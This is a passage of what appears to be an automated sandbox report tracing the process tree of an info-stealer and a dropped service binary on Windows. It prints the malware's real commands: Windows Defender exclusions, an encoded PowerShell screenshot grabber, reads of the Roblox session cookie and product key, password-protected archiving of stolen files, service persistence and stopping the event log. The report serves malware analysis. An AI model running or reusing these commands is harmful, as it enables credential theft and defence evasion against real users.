        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:1000
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:2928
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:2320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
        7⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:840
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        8⤵
        Views/modifies file attributes
        
        PID:2448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'"
        7⤵
        
        PID:4280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:2420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:3432
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:1068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        7⤵
        
        PID:1240
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        8⤵
        
        PID:5196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        7⤵
        Clipboard Data
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        8⤵
        Clipboard Data
        
        PID:5468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:4076
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:5476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4884
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:4192
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        7⤵
        
        PID:4512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4852
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:5504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        7⤵
        
        PID:5152
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        8⤵
        
        PID:5544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        7⤵
        
        PID:5164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        8⤵
        
        PID:5696
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0fr2w0tb\0fr2w0tb.cmdline"
        9⤵
        
        PID:5416
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C5D.tmp" "c:\Users\Admin\AppData\Local\Temp\0fr2w0tb\CSCF2ECD03053974E4DA4368A92B46BBF45.TMP"
        10⤵
        
        PID:5580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:5776
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5820
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:6024
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:6080
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5244
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:5228
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:5400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5608
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5272
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:1000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        
        PID:6084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        7⤵
        
        PID:6016
        
        C:\Windows\system32\getmac.exe
        
        getmac
        8⤵
        
        PID:5344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI17122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\FSR76.zip" *"
        7⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\_MEI17122\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI17122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\FSR76.zip" *
        8⤵
        Executes dropped EXE
        
        PID:5616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        7⤵
        
        PID:3060
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        8⤵
        
        PID:5528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        7⤵
        
        PID:3016
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        8⤵
        
        PID:5600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:1972
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:3736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        7⤵
        
        PID:3316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:4408
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:4184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        7⤵
        
        PID:5968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        8⤵
        
        PID:5532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5664
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5708
    - - C:\Users\Admin\AppData\Local\Temp\onedrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\onedrive.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4736
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5092
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4400
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:5932
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "KOPWGCIF"
        6⤵
        Launches sc.exe
        
        PID:4900
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:5880
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:6072
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "KOPWGCIF"
        6⤵
        Launches sc.exe
        
        PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\Files\file.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:6020
    - - C:\Users\Admin\AppData\Local\Temp\Files\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1668
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5960
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5932
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5912
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:3600
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5260
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5864
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5748
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:3456
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5424
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5188
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:1928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5688
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:4436
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:3796

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1440 -ip 1440
1⤵
PID:3500

C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5976
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5236
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6084
- C:\Windows\system32\cmd.exe
